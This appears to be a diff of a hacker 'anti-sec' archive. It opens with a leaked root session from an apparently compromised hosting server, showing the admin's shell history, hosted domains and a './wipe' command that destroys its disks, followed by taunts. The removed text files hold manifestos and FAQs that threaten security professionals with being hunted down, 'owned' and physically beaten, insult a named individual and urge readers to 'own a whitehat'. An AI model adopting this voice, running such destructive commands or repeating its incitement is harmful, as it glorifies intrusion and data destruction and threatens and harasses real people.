-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel
drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel
drwx------ 3 root root 4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x 2 root root 4096 Aug 21 2006 cse
-rw-r--r-- 1 root root 12207 Oct 10 2008 cse.tgz
drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf
-rw-r--r-- 1 root root 431490 Jun 5 10:52 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 12 01:51 .elinks
-rw-r--r-- 1 root root 16 Jun 13 15:33 .forward
drwx------ 3 root root 4096 Jun 11 23:59 .gconf
drwx------ 2 root root 4096 Jun 11 23:59 .gconfd
drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem
drwx------ 2 root root 4096 Jun 12 01:53 .gnupg
drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 12 23:31 .htoprc
-rw-r--r-- 1 root root 4239 Jun 12 00:01 install.log.syslog
drwx------ 6 root root 4096 Jun 12 02:33 .MirrorSearch
-rw------- 1 root root 37 Jun 12 02:11 .my.cnf
drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6
-rw-r--r-- 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz
-rw-r--r-- 1 root root 264 Jun 23 00:23 .pearrc
drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp
drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html
-rw------- 1 root root 1024 Jun 12 02:50 .rnd
drwx------ 3 root root 4096 Jun 12 02:41 .spamassassin
drwx------ 2 root root 4096 Jun 22 09:11 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp
drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi
sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 31G 7.5G 22G 26% /
/dev/sdb1 452G 35G 394G 9% /home
/dev/sda1 99M 23M 72M 24% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# who
root pts/0 2009-07-03 20:18 (125.238.144.224)
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 64Z 64Z 24G 100% /
/dev/sdb1 64Z 64Z 417G 100% /home
/dev/sda1 16Z 16Z 77M 100% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# exit
exit
-----------------------------------
osiris [ DOWN ]
devil [ DOWN ]
-----------------------------------
Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.
Fix that first, you dig?
~ There will always be no way out.

223
anti-sec/txt/ats-policy.txt
View file

@ -1,223 +0,0 @@
~~~
~ Anti security "policy" v0.9 by anonymous
~ - Save the bugs!
~
~~~
-- This is my view and it does not fully speak for all the people
-- that are involved in anti security and it is subject to heavy change.
Content:
Introduction.
What is this policy?
Purpose of the policy.
Is this a joke ?
The policy.
Using the policy.
Contribute to the policy.
Thanks & reference.
[ Introduction ]
Hello.
This policy is designed to try to advocate a new a completly different
policy for the underground community that is designed for "anti disclosure"
basicly the opposite of full disclosure but with a few side notes that advocate
some disclosure of bug information but in general this is designed to be a
policy that people will read and think, "Hey.. this is the right thing!",
hopefully.
[ What is this policy ]
This policy is basicly a guideline.
It will demonstrate that it is not good to post bug/exploit information to
places like BUGTRAQ, packetstorm, other public forums. It will show that
most of the people that are excessively posting bugs to these public forums
are actually not doing it for security but quite the contrary for things
like fame, jobs, etc.
The policy will show you that if you are really interested in security
that there is a much better way of increasing security, because basicly
when you send a new bug and an exploit to a place like BUGTRAQ you are
actually decreasing security and potentially causing hundreds of thousands
of people high damage from when script kiddies use your bug/exploit to
break into their system.
It will demonstrate the best way to maintain the anti security policy
which is to keep bugs/exploits private within either a very small group
of trusted people that have the skill to understand what it is about or just
simply keep it for yourself. If however the exploit leaks you should contact
vendor and tell him about the bug. If the bug is discovered by someone else
or the vendor has fixed the problem you are free to post the exploit to a
non public forum, maybe your website.
Also it is essential to demonstrate that a person that is looking for security
bugs does so just for the sheer enjoyment and thrill, difficulty of finding
and obvious bug or a very difficult to find bug and then possible exploiting
it, after this has taken place he should carry on and start looking for other
bugs, ie: by auditing src code, doing protocol 'checks', reverse engineering
and using security logic. This is an important thing in this policy that needs
to be addressed. We do this because we love it!
[ Purpose of the policy ]
The purpose of this policy is to raise public awareness of a new way
of thinking in the security scene, it is written to try to help out
the anti security movement and to show interested people the best
way to be a part of the anti security movement, by using this policy.
One of the main reasons for this policy and what it is meant to address is the
need for none-disclosure, which is basicly because way too much stuff is
getting sent to BUGTRAQ and people like us really dont like it that way
and we hope that you wont like it either after studying anti security.
The purpose of this policy is to give people that are hackers a policy
that they can use to keep things private as they should remain and not
tempted by the dark side.
[ Is this a joke? ]
For some reason a lot of people think this is a joke, I've been asked about 4
times wether this whole anti security thing is a joke. And to answer your
question about this policy, No! It is not a joke we take this seriously but
we welcome any flames, comments or whatever that anyone might have.
[ The policy ]
The policy in a nutshell.
1. Do not tell the world about security bugs you find.
2. Do not release exploits to public forums.
3. If you are serious about security, notify only vendor.
4. If exploit leaks, notify vendor.
5. If bug becomes public, you are safe to release exploit to
a none public forum.
6. Never ever give bug or exploit information out on a bug/exploit
trusted to you by the discoverer/author of the bug/exploit. This
is basis for trust, do not give what you did not write!
This will demonstrate basicly the steps and scenarios that might
happen and how the policy is used in those steps, thus describing the
policy.
note: fiction ;>
Okay let's create a few variables.
HACKER = The person that wants to use the anti security policy
VENDOR = Company or group that wrote the program that HACKER found bug in
COMMUNITY = BUGTRAQ, PACKETSTORM, and the like.
Background:
HACKER is an avid auditer and finds a bug in bind-8.2.2-P7 a 1 byte overflow
which is pretty difficult to exploit but he manages, he writes an exploit
for this bug and he gives it to a very small amount of people, possible
people that are maybe in his group or that he trusts explicitly.
< scenario 1 >
HACKER who is a follower of the anti security policy does not notify the
community or the vendor and the bug lives on for many years, hopefully ;>
Causing little or no damage at all.
< scenario 2 >
HACKER is a TRUE security minded person, ie: someone that really cares
about security and is not the typical "hey I say I care about security
but what I really want is fame and a job". Allright this person who
also has hopefully read something about the anti security movement and
since he really apreciates security he should ONLY contact the vendor and
let them handle it.
< scenario 3 >
HACKER is a glory/fame seeker and he decides to post the bug to the
COMMUNITY. Ofcorse he says it is in the interest of full disclosure
and not fame and the like. He has read some full disclosure
policy and notifies vendor maybe 5 days before he releases the bug and
most likely the exploit too.
After the five days have passed, we must conclude that the vendor has issued
some sort of hotfix or a patch to fix the security problem and now the HACKER
sends the bug information, the exploit to the COMMUNITY and possible a
patch too.
Now has security been increased? Do you really think that most of COMMUNITY.
ie: the people that read BUGTRAQ want to patch their servers? No! It is
script kiddies that are waiting for the latest warez, as soon as HACKER
releases this new bug to the COMMUNITY thousands of script kiddies with
little or no skill will start breaking into hundreds of thousands
of boxes and if this bug were genuine, they would! And belive me lots of
boxes would get destroyed.
Now, I ask.. is this a good thing you are doing by posting to the COMMUNITY
all logic says NO!
< scenario 4 >
HACKER in this scenarion followed the anti security movement.
HACKER has had the exploit for a year or more and now for some strange
reason you hear rumors that script kiddies have the exploit. If these rumors
turn out to be correct you have an obligation to notify the vendor, so that
they can issue a patch, because this can cause just as much havoc as when
people post to the COMMUNITY
Q: Well what is the damn difference then?!? It is bound to leak someday.
A: Yes it happens much to often but there is alot of stuff out there
that has not leaked and the best way to not make things leak is too
not give to anyone at all. This however is not possible for some so
the best thing is to limit it to ONLY people that you trust 100 %.
And we hope that people that follow the anti security trend will
also realize a crucial point which is not to give what u didn't write!
Someone else has found the bug that HACKER found and has notified the
COMMUNITY and VENDOR. After this has happened HACKER is free to publish
his code on a non-public forum, like his personal website. This however is not
required at all.
[ Using the policy ]
Follow the guidelines that were outlined in previous sections, and remember
what keynotes.
[ Contribute to the policy ]
This policy is considered pre-beta and is subject to heavy change. We need
alot of help in adjusting this policy and so if you have any ideas about
things that are not clear and how to clear them up then please send us
that information. Also if you have things you would like to add/tweak
just send it.
[ Thanks and reference ]
This policy is written by anonymous and it will remain that way because
it is not supposed to portrait the views on a single person but of all
the people that follow this movement.
However certain groups and people deserve credit:
silent for starting anti security and doing most of the work.
jimjones for writing the great intro and FAQ!
RFP for writing a policy for the full disclosure people.
Everyone that has contributed so far!

92
anti-sec/txt/faq1.txt
View file

@ -1,92 +0,0 @@
THIS MOVEMENT IS APART OF THE ANTI-SEC / ANTI-WHITEHAT MOVEMENT.
THIS IS NOT A JOKE READ THE ENTIRE FUCKING FAQ.
THIS IS THE SIMPLE #PHRACK FAQ:
keep this in mind: when speaking of phrack "magazine" we mean that whitehat
magazine on phrack.org. also we use examples, but this applies to all people
and websites that fall into these categories.
1) what is a whitehat?
a) A WHITEHAT IS ANYONE WHO HELPS THE SECURITY INDUSTRY (POSTING BUGS/INFO ETC)
2) are there greyhats?
a) NO, ONCE A PERSON HAS THE EVIL WHITEHAT WAYS INSIDE OF THEM, THEY BECOME A PURE WHITEHAT, PLAIN AND SIMPLE.
3) how come "blackhats" are helping the security industry (bugtraq/phrack)?
a) THE SECURITY INDUSTRY INFECTS HACKERS WITH THESE EVIL THOUGHTS. THE
SECURITY INDUSTRY BRAINWASHES HACKERS TO WORK FOR THEM (BY PUBLISHING THIS
BUG/INFO/CODE INFORMATION). ALSO THESE PEOPLE ARE NOT BLACKHATS, THEY ARE
WHITEHATS BASED ON QUESTION #2. THE PROBLEM IS THAT THEY DO NOT REALIZE IT.
ALSO MOST OF THESE SO CALLED "BLACKHATS" DONT HACK. REAL HACKERS DO NOT
ACTUALLY PUBLICIZE SUCH INFORMATION (TO PHRACK BUGTRAQ ETC).
4) how is phrack a whitehat magazine?
a) EVERY TECHNIQUE THAT IS RELEASED IN PHRACK IS NOW REALIZED BY THE SECURITY
INDUSTRY. THE SEC INDUSTRY NOW SPENDS TIME TO THWART THESE TECHNIQUES.
ALSO, ALOT OF THE ARTICLES IN PHRACK DO NOT BENEFIT THE "HACKER SCENE"
AT ALL. HOW IS IT POSSIBLE THAT "POSITIVE" IDS ARTICLES OR HONEYPOT
KEYLOGGERS MAKE THERE WAY INTO A "for hackers by hackers" MAGAZINE?
5) what are people like spaf/chris rouland/lance then?
a) THEY ARE THE ENEMY. WHITEHATS = ENEMY.
6) im confused, i thought k2 is a blackhat but he helps with honeypot?
a) HES NOT A BLACKHAT, HES A BAD ROLE MODEL FOR ALL HACKERS. HE IS
BRAINWASHED BY THE SECURITY SCENE. IF HE CHANGES - GOOD FOR HIM. IF HE
CONTINUES HIS WAYS - HE WILL CONTINUE TO BE THE ENEMY.
7) i get what you're saying now, so like k2/duke/horizon/scut (for example)
aren't really hackers, they are just brainwashed by the security industry
to work for them?
a) THIS IS ABSOLUTELY FUCKING CORRECT.
8) so what am i supposed to do?
a) STOP MAKING ANY OF YOUR INFORMATION PUBLIC. BY INFORMATION WE MEAN
CODE,BUGS,TECHNIQUES ETC. KEEP THIS INFORMATION PRIVATE. DON'T TRADE
IT ON IRC. DON'T ENTRUST THIS INFORMATION INTO INDIVIDUALS YOU DONT
TRUST 100% (SOME PEOPLE TURN AROUND AND LEAK ALL YOUR SHIT OR THEY
END UP SELLING IT TO ISS). AND FOR FUCKS SAKE, TRY ACTUALLY USING
WHAT YOU CODE/FIND.
9) why do people like that whitehouse guy say "hackers shouldnt help criminals"
or "hackers should help security industry by responsibly disclosing bug
information to companies"?
a) THIS IS APART OF THE MASSIVE CAMPEIGN TO GET HACKERS TO WORK FOR THEM.
THE FACT IS THAT IF THE "HACKING SCENE" DOESNT HELP THE SECURITY INDUSTRY,
THEY WILL BECOME LOST BECAUSE THEY ARE A BUNCH OF COMPLETE IDIOTS. THE
BEST BUGS/INFORMATION IS USUALLY GIVEN TO THE SECURITY INDUSTRY BY PEOPLE
IN THE "HACK SCENE", AND THIS IS A FACT. IT MUST STOP.
10) how can i help?
a) HELP SPREAD THIS WAY OF THINKING TO EVERYONE YOU KNOW, ONCE PEOPLE REALIZE
THEY ARE BEING BRAINWASHED AND PROFITTED OFF OF, THEY WILL CHANGE. IF YOU
WANT TO MAKE A SIGNIFICANT CHANGE, START MAYBE THINKING ABOUT PROJECT MAYHEM.
11) ok, but like what if i dont want to change now? "lol"
a) YOU WILL BE HUNTED DOWN LIKE K2, DERAADT, DUGSONG, ETC. THE INTERNET
IS NO LONGER SAFE FOR WHITEHATS. NO LONGER SAFE FOR THE SECURITY INDUSTRY.
12) what should whitehats think of this movement?
a) WHITEHATS/SECURITY INDUSTRY PEOPLE SHOULD BE AFRAID OF THIS MOVEMENT.
IT SEEMS THAT HIGH MEMBERS OF THE SECURITY INDUSTRY HAVE ALREADY FALLEN
VICTIM TO THIS MOVEMENT. THEY SHOULD STOP PUBLICLY MAKING AVAILABLE
INFO SUCH AS "BUGS" OR "CODE" OR "TECHNIQUES". IF THEY DO NOT CHANGE
THEY WILL CONTINUE TO BE TARGETED, AND IT SUCKS TO GET OWNED/FIRED/
PHYSICALLY BEATEN.
13) why does #phrack like DMCA?
DMCA MAKES IT SO THAT PEOPLE CAN'T POST THESE BUGS/CODE ETC. READ UP
ON IT. IT WILL BE A GREAT WEAPON FOR THIS MOVEMENT ONCE IT STARTS
BEING ENFORCED ON A REGULAR BASIS.
14) ya ok, i think im going to change, this isn't some joke right?
a) NO IT ISN'T A JOKE. SECURITY INDUSTRY CANT SURVIVE AT ALL WITHOUT
THE SELLOUTS & BRAINWASHED SECTION OF THE HACKER SCENE. CHANGE YOUR
FUCKING WAYS. DONT POST. DONT HELP THE SECURITY INDUSTRY.
STOP... BEING.... BRAINWASHED......................
THE END: written in 25 minutes by the PHC, so dont bug us.

70
anti-sec/txt/faq2.txt
View file

@ -1,70 +0,0 @@
Ok, lately more and more people kept asking the same questions.. They forced me to write down this FAQ so, read it and then ask questions!
1. What the fuck is pr0j3kt m4yh3m i been hearing about?
Pr0j3kt m4yh3m is the movement started by a group of blackhats that decided
they can't bare anymore with the FUD and lies spread by the whitehat
community, with the greed that is definitory for IT security companies, with
the leeching performed by these companies on hackers and so on. Pr0j3kt
m4yh3m is carried on by multiple independant cells who accomplish project's
missions. This movement is not about terrorism but more about retaliation
and cyber guerilla warfare.
2. Why do you hate whitehats? Just because they earn money?
Heh, this one is a redundant question. It keeps repeating all the time. Now,
once and for all, we don't hate the whitehats because they earn money but
for the ways they earn those money. By lying, by spreading rumours, by
leeching on the underground that formed them. Them and IT companies are also
targeted because they lie clueless people regarding hackers. They make
hackers look as some sort of cyber terrorist that all he does is creating
panic amongst all sorts of internet habitants. They also say that hackers
can break into *ANY* machine connected to the internet, this ofcourse
creating panic and enlarging their market segment. They don't care about
security, all they do care about is money. They are evil! They leech their
employees, they leech the underground, they leech their clients. Figure out
for yourself.
3. Why are you guys against full disclosure?
Disclosure is, never the less, a bad thing. Figure it out: how many
classified informations from other domains are made public?! NONE, zero,
nada, nothing! But still, they promote the full disclosure in computer
security. Have you ever asked yourself why? It's not that they care for the
regular company that can't afford to hire a decent administrator... They
want publicity, they want media attention, all this resulting in material
benefits: if an IT security company makes public a proof-of-concept code or
an advisory, it performs two things. It gets fame for that (and ofcourse, a
larger market segment) and thousands of kiddies all over the world eventually
work out an exploit from the advisory. So, people would fear getting hacked
so, they would become customers of that IT security company. Remember this:
knowledge given is power lost. Why giving powerful weapons to the kids all
over?
4. Real blackhats stay in underground. Why did u come out front?
As we stated in 1., we just can't stand anymore seeing what the whitehat
community is doing. They almost killed the scene, breaking it in half.
Whitehats all over the world are brainwashing thousands and thousands of
people, making them share their mindset. As a result, people think that
blackhat equals script kiddie and hacker equals IT security researcher. This
is so wrong! Hackers hack! Most of whitehat knowledge originates from the
underground. Most of the stuff they publish is heard by them from the few
underground connections left. And yet, they try to kill this underground and
they call it "script kiddies". ~el8/PHC/other groups will carry on this war
forever, until something changes! More and more groups adhere to pr0j3kt
m4yh3m.
5. Is Pr0j3kt M4yh3m visible to us?
Hell yeah! Even if nobody knows the other cells, even if nobody knows what
others do, look around you: you see supposedly secured servers gettin
hacked, you see security professionals hacked proving that they are giving a
false sense of security. *EVERYTHING* aimed at harming security industry in
one way or the other is an action of pr0j3kt m4yh3m. Pr0j3kt's cells are
spread all over the world, one could even be in your neighbourhood so watch
out!

199
anti-sec/txt/hack4.txt
View file

@ -1,199 +0,0 @@
A PHC PRODUCTION: THE REAL SCRIPTKIDDIES
[Posted to the netsys.com 'full-disclosure' list.]
Does anyone find it strange that the talentless scriptkiddy Ron DuFresne is
banging on about "kids this" and "kids that"? I certainly do. This clueless
moron is in no position to speak down on or scold those he obviously knows
nothing about.
If you search google for his name, you can easily see the technically inept
scriptkiddy Ron DuFresne making a monkey out of himself:
http://www.google.com/search?q=%22Ron+DuFresne%22
This guy knows nothing beyond 1980's security policy construction and
point-and-click firewall operation. He makes many technical blunders in his
posts and displays an uncanny knack for sounding like a total dumbass.
For those out of the loop, the scriptkiddy Ron DuFresne was a former member
of the defacement group known as GForce Pakistan, albeit only for a month or
so at most. What's sad is that he has admitted this in the past, but
justifies it as some kind of adventure "for research purposes." He also
denies having defaced any websites. Still, makes you wonder, doesn't it?
I also see many other technically incompetent people/leeches on this list
who are making unqualified assertions that so-and-so are scriptkids, that
so-and-so don't know their stuff, that so-and-so are attention deprived...
If you can answer 'yes' to all of the questions below, then by all means
feel free to think of yourself as equal to or better than these ~el8 guys.
Otherwise, please stop speaking down to people who are obviously much more
technically skilled than your ignorance will ever allow you to be.
* Do you know how to program in C? Are you intimately familiar with ISO C89?
C99? While other people in your neighbourhood were out partying, were you
sitting at home in bed making an almost biblical study of the POSIX
standards? What about those from The Open Group?
* Do you know how to write hash tables? Balanced trees? Do you know the art
of algorithms? Do you know Knuth's work like the back of your hand? Did you
teach yourself everything about computers that one would otherwise only
learn by paying thousands of dollars for in Computer Science tuition?
* Do you know how to juggle assembly code in your head for multiple
architectures, such as MIPS, SPARC, x86? Do you understand the peculiarities
of each architecture down to the nittiest, grittiest details? Can you
optimize your own assembly routines? Can you take advantage of things such
as Pentium instruction pairing or the delay slots in various RISC
architectures? Do you understand the deal with the I-Cache on MIPS? Are you
fluent in assembly language? Hell, do you even know what SPARC stands for?
Quadrants in PA-RISC, make sense?
* Do you know how to write your own exploits? Do you know how to audit
software with surgical precision for the most intricate bugs imaginable? Do
you know how to take advantage of buffer overflows? Do you know how to
exploit off-by-one errors on a little-endian machine? Do you know about
integer overflows and signedness issues? Can you exploit format string
vulnerabilities? Can you gain control of a process vulnerable to a heap
overflow via a deep knowledge of the malloc implementation on the target
host? Do you know how to bypass the "security" afforded by crap like
Openwall, StackGuard, PaX? Or is your knowledge of these things limited to
the papers that non-hackers publish? You probably think the people trying to
help the security community with bullshit patches/fixes like this are
hackers, when in fact no hacker would ever publish any such thing that aims
to improve security.
* Have you studied the UNIX kernel with as much fervour as some would have
for physical pursuits such as basketball or baseball? Do you know the data
structures and organization in the kernels of various operating systems?
Have you read books on UNIX internals cover to cover? Do you know how Linux
works under the hood? Can you write your own kernel modules for both defense
and offense? Ever written a kld on FreeBSD? Can you write a device driver
for a peripheral that your OS doesn't support? Can you find flaws in kernel
src trees that allow you to compromise a machine given local access?
* What do you know about evading (N)IDS? Your knowledge isn't limited to
what Thomas Ptacek & Tim Newsham have said years ago, right? Surely you
don't rely on tools written by people like Dug Song who like to think of
themselves as hackers, when in fact they are traitors to the underground,
assuming they were ever a part of it to begin with.
* What do you know about defeating firewalls? What techniques have you
innovated and pioneered on your own? What tools have you written that allow
you to toy with firewalls? Hell, the fucktard security community is probably
limited to lameass crap like Firewalk.
* What do you know about web security? Do you sit back and laugh at the
"cross-site scripting" revolution governed by an idea that has been around
well before the CSS/XSS sensation that literally blew the dumbass security
community apart? Must've wasted a lot of brain cells with that gigantic
stretch of the imagination. Do you laugh at all these "SQL injection" papers
and how most of them overlook the blatantly obvious: they have you believe
you have to fumble around with all kinds of convoluted queries to achieve
something that can be done with minimal typing if only they'd read the
fucking documentation for various DBMS. Their CGI experts like RFP and
Zenomorph call certain script conditions non-exploitable, e.g. when you
can't get arguments supplied to a binary that you've managed to trick a Perl
script into running -- RFP mentions this in his Phrack article -- yet any
moron can easily figure out that you can use the POST method, make the
script run /usr/bin/perl for instance, and have it run a script of your
choice that is fed as stdin from the HTTP request's POST data. Oh God, sorry
for pushing the realm of web security forward with this INCREDIBLY COMPLEX
revelation.
* Have you written your own tools that exploit protocol weaknesses? Have you
written your own tools for routing protocol weaknesses, e.g. RIP, BGP? Have
you written your own tools that play games with DNS? Have you written your
own ARP cache poisoning / mitm tools? Your own tools for shit like icmp
redirects and router advertisements? Can you write a tool that will exploit
the TCP sequence number prediction + IP spoofing vulnerability of older
days? Or can you only mock Mitnick for his 1994 attack, calling him a
scriptkiddy? Or utter useless banter about ISNs and cookies that you
digested from some textfile? Who are you kidding? Fuck, have you read all 3
volumes of the glorious TCP/IP Illustrated, or can you just mumble some
useless crap about a 3-way handshake? Do you know Net/3 code? TCP
algorithms? TCP extensions? Perhaps you're some fucking security expert
because you've memorized /etc/services -- a walking fucking getservbyport, a
la 70% of the Vuln-Dev subscription base.
.....................................
I have seen the ~el8 guys cover the full spectrum of everything discussed
above. 95% of the people calling them scriptkids probably can't even code
helloworld.c.
Further ranting for those who are so quick to judge...
Are you just a fucking whitehat leech who knows nothing more than how to use
tools written by others? Using techniques and exploits that most likely
originated in the playground of blackhats known as the computer underground.
More likely than not you're a fucking scriptkid who only knows how to do
mundane and trivial crap like configuring ACLs on a Cisco router or some
half-assed product such as Firewall-1.
You likely are so ignorant that you believe anyone who compromises machines
is a clueless scriptkiddy like yourself. You likely are so idiotic that you
believe that Bugtraq and CERT will protect you from the latest 0day
exploits.
You think Apache 1.3.26 can't be compromised remotely with one of four two
year old Apache remotes that haven't even been hinted at on the security
lists. You think sendmail is (now) remotely secure because what you don't
see on Bugtraq doesn't exist. Qmail. ProFTPd. My God, you people are so
fucking out of it. People report intrusions on their machines and you
dumbfucks immediately conclude it's done by some public vulnerability, e.g.
OpenSSL. That's right, because in your ignorant bliss there are no skilled
people out there who would actually use their exploits to hack.
Narrow-minded fools. Scriptkiddies.
You know nothing of what lurks beneath the surface glamour of the corrupt
security industry/community. Your only resort is to call these people kids.
Trust me, they laugh at you clueless imbeciles. They laugh at your feeble
attempts to manipulate hacking so that it becomes some fucking ethical or
philanthropic pursuit. They laugh at your "hacker vs. cracker" debates. They
laugh at anyone who thinks hacking isn't about compromising computer
systems.
Who are the scriptkids now? You're outgunned and outclassed. Take a nap and
retire, you pathetic leeches.
The scriptkids like Ron DuFresne and Anodyne Perspective are likely going to
snap after reading this, so I'm sitting back looking forward to the imminent
outbursts from these scriptkids whose only rebuttals will be in the...
"I have my fingers in my ears, can't hear you kids NANANANANAN JAJAJAJAJAJA
itiththdsfhg grow up immature children, get a girlfriend HHSHee KkakakKAkka
pffffttt damn kiddies."
... range.
All "dox" dropped on the lists have been fake. They have been engineered by
people either making false assumptions or trying to get their "foes" in
trouble. Most of the phony ~el8 members lists mention people that have been
attacked by ~el8, ironically enough. Put one and one together. There is only
valid "info" for one of those poor souls, anywayz.
It's time for an underground revolution. You all quote The Mentor's
Manifesto in your misguided ethics rants; alas, The Mentor was an active
hacker, in the true, modern sense of the word. Stop being brainwashed ye
hackers. Keep your souls untarnished.
It's time to bring the corrupt security industry to its knees.
THE SECURITY INDUSTRY DEMOLISHED OUR WORLD.
THERE WILL NOW BE HELL TO PAY.
Offer up your best defense
But this is the end
This is the end of the innocence

48
anti-sec/txt/movement.txt
View file

@ -1,48 +0,0 @@
The purpose of this movement is to encourage a new policy of anti-disclosure
among the computer and network security communities. The goal is not to
ultimately discourage the publication of all security-related news and
developments, but rather, to stop the disclosure of all unknown or
non-public exploits and vulnerabilities. In essence, this would put a stop
to the publication of all private materials that could allow script kiddies
from compromising systems via unknown methods.
The open-source movement has been an invaluable tool in the computer world,
and we are all indebted to it. Open-source is a wonderful concept which
should and will exist forever, as educational, scientific, and end-user
software should be free and available to everybody.
Exploits, on the other hand, do not fall into this broad category. Just like
munitions, which span from cryptographic algorithms to hand guns to
missiles, and may not be spread without the control of export restrictions,
exploits should not be released to a mass public of millions of Internet
users. A digital holocaust occurs each time an exploit appears on Bugtraq,
and kids across the world download it and target unprepared system
administrators. Quite frankly, the integrity of systems world wide will be
ensured to a much greater extent when exploits are kept private, and not
published.
A common misconception is that if groups or individuals keep exploits and
security secrets to themselves, they will become the dominators of the
"illegal scene", as countless insecure systems will be solely at their
mercy. This is far from the truth. Forums for information trade, such as
Bugtraq, Packetstorm, www.hack.co.za, and vuln-dev have done much more to
harm the underground and net than they have done to help them.
What casual browsers of these sites and mailing lists fail to realize is
that some of the more prominent groups do not publish their findings
immediately, but only as a last resort in the case that their code is leaked
or has become obsolete. This is why production dates in header files often
precede release dates by a matter of months or even years.
Another false conclusion by the same manner is that if these groups haven't
released anything in a matter of months, it must be because they haven't
found anything new. The regular reader must be made aware of these things.
We are not trying to discourage exploit development or source auditing. We
are merely trying to stop the results of these efforts from seeing the
light. Please join us if you would like to see a stop to the
commercialization, media, and general abuse of infosec.
Thank you.

54
anti-sec/txt/scene_sub.txt
View file

@ -1,54 +0,0 @@
sub Scene { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOSCENE'
"Times change and technology progresses. Attackers adept and attacks evolve.
At this point in history, we can wax fondly for the halcyon days when computers
were hacked for pride or ego -- the good ole' simpler times when underground
hacker wars were electronically waged and the collateral damage was the main
website of The New York Times. Or the Solaris machines that were owned and the
high profile computer security icons that had their e-mail spools stolen and
personal poetry publicly posted. Or the OpenBSD machines that were rumored
to be silently owned and the early copies of the most lauded online underground
hacker journal that were distributed months ahead of time. Good times. Nowadays,
there is no underground hacker scene -- not like there used to be (bring back
BoW and Hagis!)." -- Mike Schiffman from the introduction to _Hacker's_Challenge_3_
While route is indeed a whitehat sellout (and appears to like watching his
co-workers be publicly humiliated), he is certainly correct about one thing:
The Scene is IDLE. Not just a little idle, we're talking over a year of idleness
here. Sure, occasionally groups attempt to make a stir. Undoubtedly, some of
the readers will remember the PHC Delka Strike Force, hosted at http://el8.ru/x/
(now down). Or the release of the epic h0no3 about one year ago. And of course,
our own fun little contributions. However, despite the hard work of a number of
individuals, many of the goals originally set forth for pr0j3kt m4yh3m by el8 and
the Phrack High Council have yet to be accomplished. This needs to change.
Instead of chatting on IRC all day, go out and own a whitehat. Do a PHC mission.
Contribute to pr0j3kt m4yh3m.
The recent events revolving around the blogger known as "InfoSec Sellout"
bring an interesting point to light. When the older "security professionals"
